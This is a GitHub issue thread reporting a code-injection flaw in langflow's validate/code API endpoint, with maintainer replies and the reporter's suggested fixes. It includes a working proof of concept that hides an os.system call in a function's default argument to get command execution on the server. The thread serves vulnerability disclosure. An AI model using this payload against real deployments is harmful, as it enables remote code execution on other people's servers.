Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Code injection by API api/v1/validate/code which can lead to code execution #696

Closed
Lyutoon opened this issue Jul 28, 2023 · 3 comments
Closed
Labels
bug Something isn't working help wanted Extra attention is needed stale

Comments

@Lyutoon
Copy link

Lyutoon commented Jul 28, 2023

Describe the bug
As defined in the source code, API validate/code validate the code and give the validation result. While the function exec is used when facing the condition that isinstance(node, ast.FunctionDef), after going into this branch, exec will be called.

But we can trigger the exec by using the default parameter of a function which can lead to code execution.

While this API is the public API, so if a service is running on a public server, attacker can do RCE by calling the API, giving a part of code to execute the code remotely, even reverse a shell.

To Reproduce
Here is the PoC:

from fastapi.testclient import TestClient

def client():
    from langflow.main import create_app

    app = create_app()

    with TestClient(app) as client:
        return client

def test_post_validate_code(client: TestClient, code):
    # Test case with a valid import and function
    response1 = client.post("api/v1/validate/code", json={"code": code})
    print(response1.json())
    assert response1.status_code == 200
    assert response1.json() == {"imports": {"errors": []}, "function": {"errors": []}}

code = """
def x(y=eval('__import__("os").system("ls")')):
    pass
"""

test_post_validate_code(client(), code)

Shell Log

➜  langflow python3 langflow_poc.py
langflow.db	langflow_poc.py	logs
{'imports': {'errors': []}, 'function': {'errors': []}}
@ogabrielluiz ogabrielluiz added bug Something isn't working help wanted Extra attention is needed labels Aug 4, 2023
@ogabrielluiz
Copy link
Contributor

Hi! What are your suggestions on this?

Sandboxing is out of reach for an open-source project like this (for now at least). I think we can test some options such as literal_eval but I'm not sure it is going to have the same result. What do you think?

@stale
Copy link

stale bot commented Sep 18, 2023

This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs. Thank you for your contributions.

@stale stale bot added the stale label Sep 18, 2023
@stale stale bot closed this as completed Sep 25, 2023
@Lyutoon
Copy link
Author

Lyutoon commented May 8, 2024

Hi! Sorry for the late reply...
My suggestion is that:

  1. add a lightweight sandbox such as ast-based sandbox to traverse all the node and filter out those malicious one such as import, dangerous functions.
  2. just replace it with literal_eval.
  3. add a comment or warning on this API that warns the user that this API should not be directly called by arbitrary user, use it as your own risk.
    Thanks! Hope these suggestions will do some help.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working help wanted Extra attention is needed stale
Projects
None yet
Development

Successfully merging a pull request may close this issue.

2 participants